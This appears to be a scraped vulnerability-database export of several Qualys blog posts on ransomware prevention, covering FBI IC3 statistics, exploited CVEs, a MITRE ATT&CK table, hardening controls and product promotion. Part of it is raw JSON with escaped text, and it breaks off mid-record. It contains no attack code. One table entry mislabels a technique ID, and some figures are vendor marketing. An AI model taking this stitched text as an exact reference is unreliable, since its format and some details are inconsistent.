[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy, which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and lateral movement around the network.

As organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating configuration assessment with Qualys Policy Compliance, organizations can ensure golden images conform to security baselines, prevent images from ever having misconfigurations, and identify configuration drift to prevent security risks.

#### **Mitigation or Important Precautionary Measures and Controls**

The Qualys internal research team has identified the top five security measures and configuration controls a security team should consider for their organization to prevent business interruption from a ransomware attack. The research is based on best practices published by FireEye (Mandiant), the Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks.

 1. Enforce password policies, e.g.
    * Minimum password age should be set.
    * Password complexity requirements should be enabled.
    * Enforce password history restrictions.
 2. Employ best practices for use of Remote Desktop Protocol, e.g.
    * Disable RDP services if not necessary.
    * Close unused RDP ports; audit the network for systems using RDP.
    * Apply multi-factor authentication.
    * Disable or block the Server Message Block (SMB) protocol and remove or disable outdated versions of SMB.
    * RDP account controls.
 3. Employ network security and firewalls, e.g.
    * Enforce firewall policy rules.
    * Deny-all rule, allowing only required networks and access.
    * Block common ports and protocols that are not required.
 4. Enforce account use policies, e.g.
    * Apply account lockouts after a specified number of attempts.
    * Admin approval requirements.
    * Apply UAC restrictions on network logons, etc.
    * Assign least privileges to users.
 5. Keep software updated.
    * Ensure automatic updates are enabled.
    * Patches and software should be installed and updated in a timely manner, which includes operating systems, applications, etc.

Qualys research has mapped misconfigurations to the relevant MITRE ATT&CK techniques (summarized in the table below) to define 237 configuration checks across five security areas (RDP hardening, user controls, network, protocol and port configuration security, share and password policies, and software update policies), essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks.

**TTP Map**

Initial Access (TA0001) | Credential Access (TA0006) | Privilege Escalation (TA0004) | Execution (TA0002) | Defense Evasion (TA0005) | Lateral Movement (TA0008) | Command and Control (TA0011) | Impact (TA0040)
---|---|---|---|---|---|---|---
Valid Accounts (T1078) | Brute Force (T1110) | Abuse Elevation Control Mechanism (T1548) | Scheduled Task / Job (T1053) | Impair Defenses (T1562) | Remote Services (T1021) | Non-Application Layer Protocol (T1095) | Data Manipulation: Transmitted Data Manipulation (T1565.002)
Supply Chain Compromise (T1195) | | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) | Inter-Process Communication (T1559) | Trusted Developer Utilities Proxy Execution (T1127) | Exploitation of Remote Services (T1210) | |
Supply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001) | | Access Token Manipulation (T1134) | | | Remote Services (T1021) | |
 | Unsecured Credentials (T1552) | | | | Remote Services: Remote Desktop Protocol (T1021.001) | |
 | | | | | Remote Services: Remote Desktop Protocol (T1021.002) | |
 | | | | | Remote Service Session Hijacking (T1563) | |

### **Automated Proactive & Reactive Patching for Ransomware Vulnerabilities**

To keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch, which allows users to automatically patch new ransomware-related vulnerabilities that are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware-related vulnerabilities, faster and at scale. For more information on Qualys automatic patch capabilities, refer to the blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>).

Following patch management best practices using Qualys Patch Management allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys Patch Management to remediate ransomware-related vulnerabilities is to leverage the VMDR prioritization report described in a previous section; this report can be used to detect assets with ransomware-related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware-related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches in the customer’s environment that are required to remediate the vulnerabilities. This allows IT teams to focus on deploying those patch jobs without needing to research vulnerabilities and manually find the relevant patches.

### **Ready to learn more and see for yourself?**

[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar: October 21, 2021, at 10am Pacific. Sign up now!

**Resources**

 * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>)
 * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>)
 * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>)
 * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>)
 * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>)

### References

 * <https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf>
 * <https://www.ic3.gov/Media/Y2019/PSA191002>
 * <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>

Source record: Qualys Blog (qualysblog), “The Rise of Ransomware”, published 2021-10-05, id QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8, <https://blog.qualys.com/category/product-tech>. CVSS v3.1: 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). CVSS v2: 10.0 HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C). CVEs: CVE-2013-2551, CVE-2015-8651, CVE-2016-1019, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2020-1472, CVE-2021-26855, CVE-2021-27065, CVE-2021-30116, CVE-2021-34527.

* * *

_The FBI has published its annual report on Internet crime. Qualys has analyzed its trends and statistics. In this post, we review our findings, especially with regard to the prevalence of ransomware, and our recommendations for actions that enterprises should take to mitigate their risk._

Every year the U.S. Federal Bureau of Investigation publishes [an Internet crime report](<https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf>) which summarizes its insights on trends and threats from cybercriminals based on all cybercrimes reported to the FBI by the American public. This annual report provides fascinating insights into the threat landscape, key trends, statistics on types of crimes, the real losses resulting from them, and perhaps most importantly, key insights into how cybercriminals operate so that we can better prepare to guard against them.

For 2021 the FBI reported 5 key threats:

 1. Business Email Compromise (BEC)
 2. Confidence Fraud / Romance Scams
 3. Cryptocurrency
 4. Ransomware
 5. Tech Support Fraud

Of these threats, only ransomware complaints continue to rise. Ransomware reports increased by almost 51% compared to 2020.

These complaints resulted in a total of $50 million in losses in 2021, compared to $30 million in 2020—a 66% rise in total losses. Ransomware attacks hit more than [290 enterprises in 2021](<https://www.zdnet.com/article/more-than-290-enterprises-hit-by-6-ransomware-groups-in-2021/>), including major organizations like [Colonial Pipeline](<https://www.bbc.com/news/business-57178503>), [Accenture](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>), [Acer](<https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/>), and [others](<https://illinois.touro.edu/news/the-10-biggest-ransomware-attacks-of-2021.php>).

### Top Ransomware Attack Vectors of 2021

Ransomware tactics and techniques are evolving continuously, allowing attackers to make their exploits more sophisticated, resulting in an increasing ransomware threat to organizations globally. Although cybercriminals use a variety of techniques to infect victims with ransomware, the top three initial infection vectors reported remain phishing emails, Remote Desktop Protocol (RDP) exploitation, and software vulnerabilities.

* * *

**Get instant visibility into ransomware exposure with Qualys Cloud Platform**

[Try it Now](<https://www.qualys.com/forms/ransomware/>)

* * *

#### Top Ransomware Variants and Exploited Vulnerabilities

The FBI’s investigations isolated the top 3 ransomware variants that victims suffered: CONTI, LockBit, and REvil/Sodinokibi. The chart below tallies the number of incidents reported for each variant:

Source: FBI

The report states, "_According to information submitted to the Internet Crime Complaint Center (IC3), CONTI most frequently victimized the Critical Manufacturing, Commercial Facilities, and Food and Agriculture sectors. LockBit most frequently victimized the Government Facilities, Healthcare/Public Health, and Financial Services sectors.
REvil/Sodinokibi most frequently victimized Financial Services, Information Technology, and Healthcare/Public Health sectors._"\n\nThe increase in remote work due to the Pandemic made four specific infection vectors more popular. Typical delivery methods for these ransomware variants were:\n\n * **Spear phishing** \u2013 campaigns using tailored emails that contain malicious attachments or malicious links\n * **Remote Desktop Protocol (RDP)** credentials that are either stolen or weak\n * **Fake software** promoted via search engine optimization that tempts users to install\n * **Common vulnerabilities** exploited in external IT assets\n\nHere are a few examples of vulnerabilities exploited in 2021 to launch successful ransomware attacks.\n\n##### Conti\n\n * "PrintNightmare" vulnerability ([CVE-2021-34527](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Windows Print spooler service\n * "Zerologon" vulnerability ([CVE-2020-1472](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Microsoft Active Directory Domain Controller systems\n\n##### LockBit\n\n * [CVE-2021-22986](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>) is a critical unauthenticated, remote code execution vulnerability in the iControl REST interface, affecting BIG-IP and BIG-IQ products. 
It was used in the [Accenture attack](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>).\n\n##### REvil/Sodinokibi\n\n * [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>) vulnerability is exploited to elevate privileges\n\n### Recommended Ransomware Mitigations\n\n##### Update your operating system and software\n\nInternet-facing servers should be patched for known vulnerabilities regularly, as well as software processing internet data such as web browsers, browser plugins, and document readers. Software and operating systems should be upgraded regularly to the latest available version. The highest priority should be patching software and operating systems running versions that vendors no longer support.\n\n##### Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments. Do not click on suspicious links!\n\nUser training has been proven to teach employees to avoid ransomware attacks from phishing and fake software.\n\n##### If you use Remote Desktop Protocol (RDP), secure and monitor it\n\nLimit access to resources over internal networks and monitor RDP access logs. Ensure devices are properly configured, and security features are enabled.\n\n##### Make an offline backup of your data\n\nRegularly run and maintain offline encrypted backups, then test them. 
Review the backup schedule of your organization and consider the possible backup disruption risk during weekends and holidays.\n\n##### Use strong passwords\n\nEnsure you have a strongly defined password policy, and ensure it is followed across the organization.\n\n##### Use multi-factor authentication\n\nApply multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems.\n\n##### Secure your network(s): implement segmentation, filter traffic, and scan ports\n\nThe most critical communications should be occurring in the most secure and reliable layer. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.\n\nBlacklist the malicious URLs/websites. Scan networks for open and listening ports regularly and close those that are unnecessary.\n\n### How Can Qualys Help?\n\n##### Comprehensive Visibility into Critical Ransomware Risk Exposure\n\nGetting a complete view of your ransomware risk exposure is a big challenge. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) helps you gain comprehensive visibility into the vulnerabilities, misconfiguration postures, and unauthorized software installed on all assets across your enterprise. Along with that, you gain visibility into available patches and can deploy these patches on the assets impacted. Our dashboard provides a glimpse of critical ransomware risk exposure across your enterprise in one unified console.\n\n\n\n##### Continuous Detection & Prioritization for Ransomware-specific Vulnerabilities\n\nThe first step toward securing your devices from ransomware is to get complete visibility of all assets in your organization. [Qualys CSAM](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides "single pane of glass" visibility of all asset types and helps to eliminate any blind spots. 
You also get visibility into unmanaged assets.\n\nThe FBI\u2019s 2021 report clarifies that exploitation of software vulnerabilities remains one of the top three initial infection vectors for ransomware incidents. Most noteworthy is that the top vulnerabilities are exploited using fake software and/or software versions no longer supported by the vendor. CSAM provides visibility into unauthorized and end-of-life software. An unauthorized software list helps you identify fake software that has been installed from unknown sources. \n\nQualys VMDR helps you to monitor and detect ransomware vulnerabilities continuously. You can view the ransomware vulnerabilities detected on assets on which unauthorized software is running using Qualys Query Language (QQL):\n \n \n Asset dropdown - software:(authorization:Unauthorized) \n Vulnerability dropdown - vulnerabilities.vulnerability.threatIntel.ransomware:true\n\n\n\nYou can also identify all of the assets on which 2021\u2019s top three ransomware variants are detected: CONTI, LockBit, and REvil/Sodinokibi.\n\nThe QQL query is:\n \n \n (vulnerabilities.vulnerability.threatIntel.ransomware:true) and (vulnerabilities.vulnerability.ransomware.name:[REvil/Sodinokibi, Ryuk/Conti, lockBit])\n\n\n\nUsing Qualys VMDR prioritization, ransomware vulnerabilities can be easily prioritized by using "Ransomware" in the Real-Time Threat Indicator (RTI) filter section:\n\n\n\nAlong with vulnerabilities, Qualys VMDR also keeps you up to date on evolving threats via its "Live Threat Feed", which can help with prioritization. The "Live Threat Feed" provides visibility of high, medium, and low-rate feeds along with a count of the impacted assets. 
Click on the count to view more details about the impacted assets.\n\nIn the "Threat Feed" tab, search using `contents:ransomware` to find all threats associated with ransomware.\n\n\n\n##### Discover and Mitigate Ransomware Misconfigurations\n\nMisconfigurations often play a vital role in ransomware attacks, as they might help the attacker gain access to your assets. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides comprehensive visibility into ransomware misconfigurations. The Ransomware Best Practices policy contains the critical controls mapped to MITRE ATT&CK mitigations as well as tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attackers' initial access and lateral movement around your network.\n\nApply this ransomware policy to all assets across your enterprise to ensure that all assets are correctly configured. You can automate the configuration assessment and apply it to your golden images to confirm your security baselines before distribution.\n\nQualys Policy Compliance helps you to configure the recommended password, RDP, network security, and software update mitigations by applying the ransomware policies on the impacted assets.\n\n\n\n##### Automated Effortless Patching for Ransomware Vulnerabilities\n\nQualys [zero-touch patching](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>) helps you automatically patch new ransomware-related vulnerabilities that are being actively exploited in attacks. 
It is faster and more accurate than manual patching and helps to patch up to 97% of ransomware vulnerabilities.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) provides a more efficient and effective way to proactively patch detected ransomware vulnerabilities. Qualys VMDR prioritizes the ransomware vulnerabilities, and Qualys PM patches them. This tight integration enables you to initiate patch jobs directly from the Prioritization tab. Quick patching of critical ransomware vulnerabilities reduces ransomware risk. Auto-correlation of patches against the ransomware vulnerabilities detected reduces your overall remediation time and makes the IT team\u2019s job easier.\n\n\n\nReady to hear more? For more details, [watch this video](<https://vimeo.com/617379785>) on our Ransomware offering. Then try out our [Ransomware Risk Assessment & Remediation Service](<https://www.qualys.com/forms/ransomware/>) at no cost for 60 days. Uncover your organization\u2019s level of exposure and create a prescribed patch plan to reduce your ransomware risk.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T09:40:56", "type": "qualysblog", "title": "Ransomware Insights from the FBI\u2019s 2021 Internet Crime Report", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453", "CVE-2020-1472", "CVE-2021-22986", "CVE-2021-34527"], "modified": "2022-05-04T09:40:56", "id": "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-05T22:35:43", "description": "Ransomware attacks are among the most significant cyber threats facing businesses today. Recent [warnings](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) about [Conti](<https://en.wikipedia.org/wiki/Conti_\\(ransomware\\)>) ransomware, issued by a joint cybersecurity advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI and National Security Agency, are a strong signal that ransomware attacks are becoming even more sophisticated and massive via the ransomware-as-a-service operating model. This model lets attackers recruit affiliates who use already-developed ransomware tools to execute ransomware attacks quickly and launch more massive attacks against almost any target, including large and small businesses, schools, hospitals and national infrastructure. While every metric and trend indicates that organizations continue to add more security tools, successful attacks continue, suggesting that adding more tools isn't the answer to a strong defense.\n\nOver the last two years, phishing, insecure remote desktop protocol (RDP), and unpatched vulnerabilities have been the top attack vectors exploited by ransomware attackers. However, defenses have focused on detection and response. 
While detection and response help organizations reduce damage from attacks, it is not helping organizations prevent the attacks. For prevention, organizations need consistent remediation of root cause, which is why authorities like [CISA](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>), MS-ISAC and [NIST](<https://csrc.nist.gov/CSRC/media/Projects/ransomware-protection-and-response/documents/NIST_Ransomware_Tips_and_Tactics_Infographic.pdf>) recommend organizations adopt better prevention strategies along with tactics to monitor ransomware exposure proactively.\n\n### Clear guidelines from authorities for ransomware prevention\n\n\n\nWhile these guidelines are helpful and represent the best ways for enterprises to shore up their defenses, security teams are resource constrained and in constant fire-fighting mode, which makes implementing these best practices a monumental task.\n\n### Qualys undertakes research on ransomware to deliver actionable insights\n\nThe Qualys security team has extensively researched CISA, MS-ISAC and NIST guidance and operationalized it into a prescriptive, actionable plan to help companies address their unique risk exposure. For example, the team analyzed the leaked [Conti Ransomware Playbook](<https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/>) and historic ransomware attacks such as REvil, Nefilim, DearCry, DarkSide and Colonial Pipeline to develop comprehensive insights into specific vulnerabilities, misconfigurations, and software applications targeted in Conti, and other attacks. 
They then developed a targeted remediation plan for prioritized patching and configuration changes.\n\nSpanning five years and 36 ransomware families, the team's analysis of ransomware attacks stems from darknet forums, open-source tools, attack playbook analysis, threat intel feeds, and MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>), and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>).\n\n 1. **110 CVEs leveraged as attack vectors in the most common ransomware attacks, across 36 prevalent ransomware families, with patches available for the past several years**\n\nThe Qualys research team has thoroughly studied the major ransomware attacks in the last five years and determined that these attacks used about 110 CVEs. The following table illustrates the top five CVEs exploited in high-profile ransomware attacks across six ransomware families. These five CVEs have negatively impacted millions of assets across organizations worldwide:\n\nCVE| Used by Ransomware Family| Patch Available from Vendor| Patch Available Since| Patchable From Qualys \n---|---|---|---|--- \nCVE-2013-1493| Exxroute| Yes| March 2013| Yes \nCVE-2013-0431| Reveton| Yes| February 2013| Yes \nCVE-2012-1723| Urausy| Yes| June 2012| Yes \nCVE-2019-1458| NetWalker| Yes| December 2019| Yes \nCVE-2018-12808| Ryuk/Conti| Yes| August 2018| Yes \n \n 2. 
**17 business software applications that should always be up to date for security patches to reduce the risk of ransomware**\n\nVMware | F5 BIG-IP| Citrix ADC and Gateway \n---|---|--- \nVMware ESXi | Atlassian| Fortinet FortiGate SSL VPN \nVMware Workspace| Telerik| Microsoft Exchange Server \nOracle WebLogic Server| Drupal| Synacor Zimbra \nPulse Connect Secure| MobileIron| Zoom \nSkype| Teams| \n \nMany of the 110 ransomware-related CVEs have had patches available for years, with an average of five years since the date the patch was first available. Researchers found that among the 110 CVEs, most have patches or remediations available. Older unpatched CVEs are a favorite target of attackers, especially those on internet-exposed assets. Further analysis conducted by the Qualys research team on Conti ransomware confirms that adversaries are targeting known vulnerabilities such as Zerologon (CVE-2020-1472), PrintNightmare (CVE-2021-34527), and EternalBlue (the CVEs addressed by MS17-010) for carrying out the attacks.\n\nOne of the critical effectiveness measures of a remediation program is mean-time-to-remediate (MTTR). In 2019, the Department of Homeland Security issued a directive to improve vulnerability management within the federal government and bring the average time-to-patch for critical vulnerabilities to 20 days -- down from 149 days. A recent report from [WhiteHat Security](<https://www.zdnet.com/article/average-time-to-fix-critical-cybersecurity-vulnerabilities-is-205-days-report/>) found that the average time to fix critical vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. 
This year, Qualys researchers also published data showing that, on average, it took 194 days from the time a vulnerability was found in the customer environment to when all instances were patched.\n\nOrganizations need to urgently prioritize patches for these vulnerabilities, especially on internet-facing assets, which are an attacker\u2019s first target, and on critical infrastructure assets hosting critical database systems, to reduce the attack surface.\n\nThe MTTR data is why authorities such as CISA and NIST recommend focusing on better prevention strategies, swift prioritization and remediation of vulnerabilities as well as reactive patching, and staying continuously up to date on patching of critical software (as noted in the chart above).\n\n 3. **237 misconfigurations leveraged across multiple MITRE tactics and techniques**\n\nAnother critical attack vector is misconfigurations such as insecure RDP and admin shares that have been leveraged in multiple ransomware attacks. Qualys research has mapped misconfigurations to the relevant MITRE ATT&CK techniques to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks.\n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force (T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account 
Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n 4. **Potentially risky applications to monitor in datacenter or database environment and monitoring for absence of anti-malware/virus tooling**\n\nAlong with attack vectors, research indicates that attackers have been able to laterally move inside the organization\u2019s network and drop malicious payloads due to assets lacking security tooling such as anti-malware/antivirus/EDR solutions. [CISA guidelines](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>) also suggest organizations should ensure antivirus and anti-malware software are installed and running across an organization\u2019s environment to eliminate security tooling blind spots.\n\nMany organizations have a policy defining authorized software for data center assets, especially those hosting critical data, which is distinctly different from software allowed on corporate assets such as employee laptops. NIST highly recommends security teams monitor assets by job function and ensure only authorized applications are in use. Among the 110 CVEs researched, a few vulnerabilities were associated with software typically found on desktop and laptop assets like collaboration tools and web browsers. 
This suggests that assets hosting database systems or critical enterprise applications should be monitored to ensure they are free of this software.\n\nAdditionally, the Qualys research team identified 33 known antivirus or anti-malware tools that provide malware protection against known malware, with continuous updates to the detection. Qualys recommends that organizations continuously assess their IT environment to ensure that all assets are running the latest anti-virus/malware tools.\n\n### Challenges in following guidelines for preventing ransomware attacks\n\nThe internet is flooded with articles, advice, and guidelines from security vendors and industry groups. Yet, it is clear in conversations with customers and partners that while they are looking to strengthen their prevention strategies, they are running up against issues that prevent them from operationalizing this advice.\n\n * There\u2019s no clear, comprehensive, research-driven list of ransomware-specific data points for monitoring risk exposure, nor is there a prescriptive remediation plan. Additionally, high-level guidelines from CISA and NIST require operationalization.\n * Traditional vulnerability remediation involves multiple teams and processes. First, a scanning tool identifies vulnerabilities, and next they are passed to the patching team for remediation. This fundamental challenge leads to longer vulnerability exposure times. A lack of alignment between vulnerability and patch processes and the manual efforts required for vulnerability remediation are among the key causes of delayed patching.\n * Many security leaders still rely on security controls such as EDR, XDR, next-generation firewalls (NGFW), or Secure Access Service Edge (SASE) for ransomware protection. Relying solely on detection and response tools, or even on a simple vulnerability management program is not an adequate defense. 
NIST\u2019s Tips and Tactics for Dealing with Ransomware suggests the basic defense requires a unified and automated approach to assessing internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), and detection of risky software and assets missing anti-malware solutions. This requires multiple security tools and has the potential to result in siloed views.\n\n### Assess & continuously monitor your ransomware risk, powered by Qualys Research\n\nTo help organizations assess risk from ransomware attacks, Qualys is offering a 60-day, no-cost service to provide clear and actionable insights into your organization's ransomware exposure, along with an automated remediation plan to reduce the risk of attacks. \n\nLeveraging the Qualys research team's expertly curated list of ransomware-specific vulnerabilities, misconfigurations, and risky software, the Qualys Ransomware Risk Assessment solution delivers a prioritized remediation plan that provides:\n\n * A unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure RDP, and detection of risky software in the datacenter environment, along with alerting for assets missing anti-malware solutions\n * Accelerated remediation of ransomware exposures with zero-touch patching by continuously patching ransomware vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to keep software up to date\n * A way to communicate to executives the true risk associated with multiple ransomware attack vectors\n\nFigure 2: Qualys Ransomware Risk Assessment Service Dashboard\n\n### Learn more and see for yourself\n\nTo learn more about the research and how the Ransomware Risk Assessment & Remediation Service can help reduce your ransomware risk, join the webinar, Combating Risk from Ransomware Attacks, on October 21 at 10 am PT. 
[Sign up now](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>)!\n\nSee the service yourself, and [try it at no-cost for 60 days](<https://www.qualys.com/forms/ransomware/>) to learn your exposure and get a prescribed patch plan to reduce your ransomware risk.\n\n### Resources\n\n * [Ransomware Risk Assessment Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>)\n * Read the [technical blog](<https://blog.qualys.com/product-tech/2021/10/05/the-rise-of-ransomware>) on the Qualys Ransomware Risk Assessment solution to learn what it includes and how unified dashboarding of your exposure drives remediation.\n * [Register](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) for the _Combating Risk from Ransomware Attacks_ webinar\n * [Video](<https://vimeo.com/617379785>) on Ransomware Risk Assessment\n\n### References\n\n * [CISA Ransomware Prevention Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>)\n * [CSRC Ransomware Risk & Prevention](<https://csrc.nist.gov/projects/ransomware-protection-and-response>)\n * [Top Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>)\n * [CIS MS-ISAC Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>)\n * [CIS Guidelines for Preventing Risk of Ransomware](<https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": 
